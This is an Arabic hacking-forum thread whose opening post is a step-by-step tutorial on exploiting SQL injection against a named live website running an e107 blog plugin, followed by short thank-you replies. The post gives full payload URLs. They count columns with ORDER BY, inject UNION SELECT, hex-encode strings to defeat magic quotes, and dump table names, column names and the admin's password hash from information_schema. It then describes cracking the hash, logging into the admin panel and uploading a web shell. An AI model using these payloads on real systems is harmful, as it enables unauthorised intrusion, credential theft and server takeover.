التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-14-2010, 01:19 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية dolla
 

 

 
إحصائية العضو





dolla غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dolla is on a distinguished road

افتراضي بالصوراستغلال ثغرات sql injectionورفع الشيل فى الاصدار الخامس+تخطى acess denied+تخطى الMagic quotes مميز




السلام عليكم ورحمة الله وبركاته النهارده هشرحلكم اكتشاف واستغلال ثغرات الحقن "sql injection"

طيب اول حاجة لازم تشوف الدرس الى فات عشان تفهمود درس انهارده :-



====================================
ما معنى ثغرات ال sql injection ولماذا سميت بهذا الاسم؟
=====================================

ثغرات الحقن او ثغرات ال sql injection سميت بالاسم ده نظرا لان الثغرة

تؤدى الى حقن او اضافة query خاص بالمخترق الى query الاصلى الموجود بالاسكربت

===========================================
كيف نكتشف ثغرة ال sql injection.؟
============================================

عشان نكتشف ثغرة sql injection لازم نختبر امكانية حقن ال query

وده من خلال اننا نروح لاى متغير بموقع معين ونضيف اى نص "string" الى المتغير ده

ونشوف لو ظهر لنا ايرور او محتوى الصفحة نقص يبقى كده الموقع مصاب بثغرة الحقن

لانه دخل النص بتاعنا فى ال query الاصلى بالاسكربت وبالتالى فهو مصاب

طيب لو رجعت الصفحة كما كانت يبقى كده تجاهل النص "string" الى ادخلناه

ولم يتم اضافة النص للكويرى الى بالاسكربت وبالتالى الموقع غير قابل للحقن اى غير مصاب ..


=======================================
اختبار " اكتشاف ثغرة sql injection " "تطبيق عملى"
=======================================

طيب عاوزين نطبق الكلام ده عملى انا معايا موقع هشرح عليه :-

نشوف المتغير بالموقع



طيب دلوقتى هختبر الموقع مصاب بثغرة حقن ام لا باضافة ' او اى نص مثلا Dolla

الى المتغير

فى الموقع ده لو ضيفت ال ' بيقولك acess denied قد ينخدع البعض ويفكر الموقع غير مصاب

لاكن انا اقولكم جربو تضيف اى نص مثلا نص Dolla للتاكد




المحتوى اختفى من الصفحة بعد اضافة النص Dolla يبقى الموقع مصاب بالحقن ..


الخطوة الجاية هى معرفة عدد العواميد الى بالquery الموجود بالاسكربت :d

من خلال order+by

===========================================
شرح وظيفة order+by على سبيل الامثلة
==========================================

طيب كتير من الناس موش فاهمة ايه فكرة عمل order by انا اقولكم

فكرة order by وظيفتها انها بترتب نتيجة عواميد معينة بدلالة عمود معين مثلا

كود:
select name,age,job from profile+order+by+1
طيب الكويرى ده هيرتبلنا الاسم والوظيفة والعمر بناء على او بدلالة الاسم "name"

كود:
select name,age,job from profile+order+by+2
هنا الكويرى ده هيرتبلنا الاسم والعمر والوظيفة بدلالة العمود رقم 2 وهو ال العمر "age"

كود:
select name,age,job from profile+order+by+3
هنا الكويرى هيرتبلنا الاسم والعمر والوظيفة بدلالة العمود 3 وهو الوظيفة "job"


كود:
select name,age,job from profile+order+by+4

طيب دلوقتى هنا طبعا هيجبلنا ايرور ليه السبب لان مفيش عمود رابع !!!!


ودى الطريقة الى هنبتعها لمعرفة العواميد فى الكويرى الى بسكربت الموقع المصاب

فانا مثلا هضيف للمتغير


كود:
macgurublog.php?uid=3+order+by+1--
مفيش ايرور ولم ينقص المحتوى .. وده اكيد لان اى query لازم يحتوى على الاقل على عمود

طيب نجرب


كود:
macgurublog.php?uid=3+order+by+2--

المحتوى رجع كامل .. يبقى نجرب


كود:
macgurublog.php?uid=3+order+by+3--

المحتوى رجع كامل .. يبقى نجرب ..



كود:
macgurublog.php?uid=3+order+by+4--

اممم المحتوى نقص .. او ظهر ايرور يبقى انا افهم ان مفيش عمود رابع اى عدد العواميد

هم تلت عواميد .. وده كان على سبيل المثال :D افتراضى يعنى

طبعا انا استخدمت "-- " للتعليق لكى تخلى اى جملة تقع بعدها مجرد تعليق تم شرحها

بالدرس السابق :- طيب دلوقتى هنجرب عملى على الموقع المصاب

==================================================

تطبيق Order+By على الموقع المصاب لمعرفة عدد عواميد الquery ألموجود بالاسكربت
==================================================

هجرب اول حاجة


كود:
macgurublog.php?uid=3+order+by+1--







الصفحة رجعت كاملة

طيب يبقى هخليها



كود:
macgurublog.php?uid=3+order+by+2--





محتوى الصفحة اختفى يبقى افهم من كده ان مفيش عمود تانى بالكويرى اى ان عدد عواميد الاسكربت

هو "عمود واحد فقط"

طيب وماذا بعد معرفة عدد العواميد ؟؟ هنتقل للخطوة التالتة وهى استخدام

ال union+select لحقن الquery بتاعنا .. واضافته الى الquery

الموجود بالاسكربت ...


===================================
استخدام ال union+select
==================================

طيب دلوقتى عرفنا ان عدد العواميد 1 يبقى انا هضيف ..


كود:
macgurublog.php?uid=3+union+select+1--

وطبعا لو كان العواميد 2

كنت هضيف :-

كود:
macgurublog.php?uid=3+union+select+2--
ولو تلاتة : كنت هضيف

كود:
macgurublog.php?uid=3+union+select+3--
وهكاذا :-

طيب نشوف الصورة ..






طيب انا ضيف - قبل المتغير 3 عشان اشوف رقم العمود ولقيت رقم العمود 1 ظهر بالصفحة


دلوقتى ممكن احقن الquery الخاص بينا مكان رقم العمود 1

طيب نشوف

===========================================
استخراج :- اسم القاعدة + اسم مستخدم القاعدة +اصدار القاعدة
===================================

هضع مكان العمود 1 :-

كود:
concat(database(),0x3e,user(),0x3e,@@version)

طيب نفسر الحقنة :-

الدالة concat() :تقوم باظهار اكثر من نتيجة بمكان عمود واحد :- يعنى هجيب

نتيجة اسم القاعدة واسم المستخدم واصدار القاعدة بمكان عمود واحد . الى هو العمود رقم 1

0X3E :دى علامة > بس بتشفير الهيكس هفصل بيها بين اسم المستخدم واسم القاعدة

والاصدار


database():لاظهاراسم القاعدة

user():لاظهار اسم مستخدم القاعدة

@@version :لاظهار اصدار القاعدة :-


طيب بعد الاستغلال نشوف الصورة ...






طيب دلوقتى عرفنا اسم القاعدة واصدارها واسم مستخدم القاعدة :- اهم حاجة عندنا

عرفنا اصدار القاعدة انه الخامس لانه بتفرق فى الحقن الاصدار فالاصدار الرابع

يعتمد على تخمين الجداول او معرفة مسبقة باسامى الجداول

اما الاصدار الخامس فيوجد به شىء اسمه ال "schema"ودى فيها اسامى الجداول

والقواعد والعواميد ..

===========================================
حقن الاصدار الخامس واستخراج أسامى عواميد القاعدة من ال schema
========================================

طيب دلوقتى عاوز استخرج جميع اسماء الجداول لقاعدة الاسكربت

الى اسمها ."turkijeappartem"

هشيل رقم 1 :- واضيف: -

كود:
group_concat(table_name)

+from+information_schema.tables+where+table_schema='t

urkijeappartem'--

table_name :ده عمود الى فيه جميع اسماء جداول القاعدة

infomation_schema.tables : ده جدول tables الى يحتوى على عمود


table_name ..


turkijeappartem : دى اسم القاعدة الى هستخرج اسامى جداولها ..

وانا وضعتها بين علامة التنصيص '' لانها string اى نص


طيب دلوقتى فى مشكلة .. ان لو الماجيك كوتس اون هيمنعنى انى اضيف ال ''

لانه هيحط / قبل ال ' والدنيا هتبوظ عشان كده هشفر اسم القاعدة بالهيكس

وهيكون الاستغلال كده

كود:
http://www.turkijeappartement.be/e107_plugins/macguru

blog_menu/macgurublog.php?uid=-

3+union+select+group_concat(table_name)

+from+information_schema.tables+where+table_Schema=0x

7475726B696A65617070617274656D--
نشوف الصورة ..






طيب جميل دلوقتى ظهرت لنا اسامى الجداول كلها انا دلوقتى هختار اسم الجدول

الى فيه اسم وكلمة مرور الادمن وغالبا يكون

login او admin او user

طيب اانا شفت اسم الجدول : وطلع "e107_user"

دلوقتى

عاوز اجيب جميع عواميد الجدول e107_user

هشيل رقم 1 واضع :-

كود:
group_concat(column_name)

+from+information_schema.columns+where+table_name=0x6

53130375f75736572--

informaion_schema.columns :فيه جميع اسماء العواميد


table_name=0x653130375f75736572 :- عشان اجيب جميع عواميد


الجدول e107_user وبالنسبة لى "0x653130375f75736572"

ده اسم الجدول e107_user بس بتشفير الهيكس لتخطى ال Magic quotes

طيب الاستغلال كامل هيبقى


كود:
http://www.turkijeappartement.be/e107_plugins/macguru

blog_menu/macgurublog.php?uid=-

3+union+select+group_concat(column_name)

+from+information_schema.columns+where+table_name=0x6

53130375f75736572--

نشوف الصورة ...






ظهرت لنا جميع اسماء العواميد طيب دلوقتى بقى انا هشوف اسماء عواميد اسم المستخدم

وكلمة المرور وودجت اسمائهم

user_name و user_password

جميل وعندنا اسم الجدول الى هو :e107_user

طيب يبقى كده وصلنا .. هضيف المرة دى بدل رقم 1

كود:
concat(user_name,0x3e,user_password)

+from+e107_user--

طيب نشوف الصورة ...






جميل ظهر لنا اسم الادمن والباس مشفر


نروح دلوقتى لاى موقع فك تشفير ال md5

زى موقع :-www.md5crack.com

وبعد فك تشفير الباصورد ... نروح لمسار الادمن e107_admin

ونكتب اسم الادمن والباصورد .. تم دخول الوحة







طيب بعد مدخلت الوحة ممكن ترفع اندكسك او ترفع شيل وتخترق السيرفر كلو ..

انا قدرت ارفع شيل






تم الشرح بحمدالله ..



fhgw,vhsjyghg eyvhj sql injection,vtu hgadg tn hghw]hv hgohls+jo'n acess denied+jo'n hgMagic quotes lld.

   

رد مع اقتباس
قديم 08-14-2010, 03:20 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية the sn!per
 

 

 
إحصائية العضو







the sn!per غير متواجد حالياً

إرسال رسالة عبر MSN إلى the sn!per

 

 

إحصائية الترشيح

عدد النقاط : 10
the sn!per is on a distinguished road

افتراضي


[align=center][/align]مشكووور عالمجهود الرائع بانتظار جديدكـ

التوقيع

الا بذكر الله تطمئن القلوب

http://www.saaid.net/twage3/009.jpg

Sniper99@vip.cn

 

   

رد مع اقتباس
قديم 08-14-2010, 03:57 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
ViRuS Qalaa
iraQi HackerS
 
الصورة الرمزية ViRuS Qalaa
 

 

 
إحصائية العضو







ViRuS Qalaa غير متواجد حالياً

إرسال رسالة عبر MSN إلى ViRuS Qalaa

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS Qalaa is on a distinguished road

افتراضي


[align=center]thank you man [/align]

التوقيع

12 My Twelve Imams


Good Bye VbSpiders
I'll Back
Si
gn Out

 

   

رد مع اقتباس
قديم 08-15-2010, 04:42 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية dz-fox
 

 

 
إحصائية العضو






dz-fox غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dz-fox is on a distinguished road

افتراضي


[align=center]السلام عليكم

بارك الله فيك أخي و الله معلومات قمة

تحياتي[/align]

   

رد مع اقتباس
قديم 08-17-2010, 05:20 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية T@gmarakT@g
 

 

 
إحصائية العضو





T@gmarakT@g غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
T@gmarakT@g is on a distinguished road

افتراضي


[align=center][/align]السلام عليكم
ما شاء الله على الشرح المميز جدا
أول مرة أرى شرح بهذا التفصيل
على فكرة الدرس الأول كان في القمة
نتمنى المزيد من شروحاتك لأنها مميزة عن باقي الشروحات
تحياتي

   

رد مع اقتباس
قديم 09-09-2010, 07:39 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
Al!Y4N3
ثعلب الصحــراء
 
الصورة الرمزية Al!Y4N3
 

 

 
إحصائية العضو








Al!Y4N3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Al!Y4N3 is on a distinguished road

افتراضي


مشكووورر اخي على
الشرح بس الشرح هذا وجدتو 6 مرات في 6 منتديات عربية
و كل مرة الصور مكتوب عليهم اسم
و اسم صاحب موضوع فشكل
و الله انو لحس مخي
بس عالعموم مشكووورررر اخي و ما قصرت في الشرح
تقبل مروري

و اذا انت صاحب الموضوع الاصلي خبرني
و احلا تقييم لعيونك

التوقيع

http://www.iraqup.com/up/20110422/tx..._153856093.jpg

صـــــــــــ ح ــــــــــراوي هـــــــــــكـــر

Email privet :
F0x9@Hotmail.Com

Email For Spiders :
Aliy4n3@Hotmail.Com
A-@Vbspiders.Com

 


التعديل الأخير تم بواسطة Al!Y4N3 ; 09-09-2010 الساعة 07:46 AM.

   

رد مع اقتباس
قديم 09-09-2010, 03:40 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


[align=center]مشكورر على الموضوع
ينقل لقسم الحقن...
تحياتي
[/align]

التوقيع

^_^



 

   

رد مع اقتباس
قديم 09-17-2011, 12:57 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو








دام علاء العماد غير متواجد حالياً

إرسال رسالة عبر Skype إلى دام علاء العماد

 

 

إحصائية الترشيح

عدد النقاط : 10
دام علاء العماد is on a distinguished road

افتراضي رد: بالصوراستغلال ثغرات sql injectionورفع الشيل فى الاصدار الخامس+تخطى acess denied+تخطى الMagic quotes مميز


جزاك الله خيرا يا أخي الكريم عبد الله

   

رد مع اقتباس
قديم 09-17-2011, 01:23 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
vpn_31
Security
 
الصورة الرمزية vpn_31
 

 

 
إحصائية العضو








vpn_31 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
vpn_31 is on a distinguished road

افتراضي رد: بالصوراستغلال ثغرات sql injectionورفع الشيل فى الاصدار الخامس+تخطى acess denied+تخطى الMagic quotes مميز


تسلم يديك فعلأ شرح سهل عل مبتدءين

   

رد مع اقتباس
قديم 10-25-2011, 06:52 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو






يحيى زكريا غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
يحيى زكريا is on a distinguished road

افتراضي رد: بالصوراستغلال ثغرات sql injectionورفع الشيل فى الاصدار الخامس+تخطى acess denied+تخطى الMagic quotes مميز


باراك الله فيك اخي
لك مني اجمل تحية

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تخطي سيف مود سيرفرات الويندوز + تخطي عدم تغيير الاندكس By ZaIdOoHxHaCkEr DannY.IraQi قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 42 12-06-2013 09:32 PM
حصـريا : تخطى السيف مود و العب بالدوال و تخطى تعطيل السيم لينك مـن الشيل Dr.Alaa قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 13 11-07-2013 04:10 AM
| شـرح تخطي صلاحية اليوز عند رفع الشيل | The Final Doom قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 13 09-01-2011 02:54 PM
طلب طريقة تخطى Access Denied (policy_denied) سيف الاسلام جـــ'ابات العناكــ'ب 0 09-30-2010 07:22 AM
"**|تخطي الرجستريRun + تخطى procexp + خدعه + تخطى مواقع الفحص دون برنامج|*" ارساوي قســم إختــراق الأجهــزة 11 09-23-2010 10:57 AM


الساعة الآن 10:20 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0